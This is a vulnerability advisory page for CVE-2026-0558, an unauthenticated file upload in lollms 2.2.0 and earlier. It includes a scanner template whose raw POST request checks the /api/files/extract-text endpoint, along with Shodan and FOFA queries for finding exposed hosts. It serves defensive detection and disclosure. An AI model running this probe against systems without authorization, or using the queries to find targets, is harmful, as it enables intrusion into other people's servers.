/Vulnerability Library

LolLMS <= 2.2.0 - Unauthenticated File Upload

CVE-2026-0558
Early Release

Description

A vulnerability in parisneo/lollms up to and including version 2.2.0 allows unauthenticated users to upload and process files through the /api/files/extract-text endpoint. The endpoint lacks the Depends(get_current_active_user) dependency used by other file-related APIs.

Severity

Critical

CVSS Score

9.8

Exploit Probability

2%

Affected Product

lollms

Published Date

May 21, 2026

Template Author

koungq

CVE-2026-0558.yaml
id: CVE-2026-0558

info:
  name: LolLMS <= 2.2.0 - Unauthenticated File Upload
  author: KoungQ
  severity: critical
  description: |
    A vulnerability in parisneo/lollms up to and including version 2.2.0 allows unauthenticated users to upload and process files through the /api/files/extract-text endpoint. The endpoint lacks the Depends(get_current_active_user) dependency used by other file-related APIs.
  impact: |
    Unauthenticated remote attackers can invoke server-side file processing, which can lead to denial of service through resource exhaustion, information disclosure through processing responses or errors, and bypass of intended access controls.
  remediation: |
    Update to a patched version containing commit a6625dc83786ff21d109b0d545ca61b770607ef3 or later. Restrict unauthenticated access to /api/files/extract-text until the update is applied.
  reference:
    - https://github.com/parisneo/lollms/commit/a6625dc83786ff21d109b0d545ca61b770607ef3
    - https://huntr.com/bounties/0a722001-89ce-4c91-b6a6-a55ee5ba2113
    - https://nvd.nist.gov/vuln/detail/CVE-2026-0558
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-0558
    epss-score: 0.01702
    epss-percentile: 0.75456
    cwe-id: CWE-287
  metadata:
    verified: true
    max-request: 1
    vendor: parisneo
    product: lollms
    shodan-query: http.html:"lollms"
    fofa-query: body="lollms"
  tags: cve,cve2026,lollms,auth-bypass,file-upload,intrusive

http:
  - raw:
      - |
        POST /api/files/extract-text HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----testFormBoundary{{randstr}}

        ------testFormBoundary{{randstr}}
        Content-Disposition: form-data; name="file"; filename="{{randstr}}.txt"
        Content-Type: text/plain

        lollms-cve-2026-0558-{{randstr}}
        ------testFormBoundary{{randstr}}--

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "lollms-cve-2026-0558-{{randstr}}", "text_content":")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and
9.8Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2026-0558
CWE ID:
cwe-287

References

https://github.com/parisneo/lollms/commit/a6625dc83786ff21d109b0d545ca61b770607ef3https://huntr.com/bounties/0a722001-89ce-4c91-b6a6-a55ee5ba2113https://nvd.nist.gov/vuln/detail/CVE-2026-0558

Remediation Steps

Update to a patched version containing commit a6625dc83786ff21d109b0d545ca61b770607ef3 or later. Restrict unauthenticated access to /api/files/extract-text until the update is applied.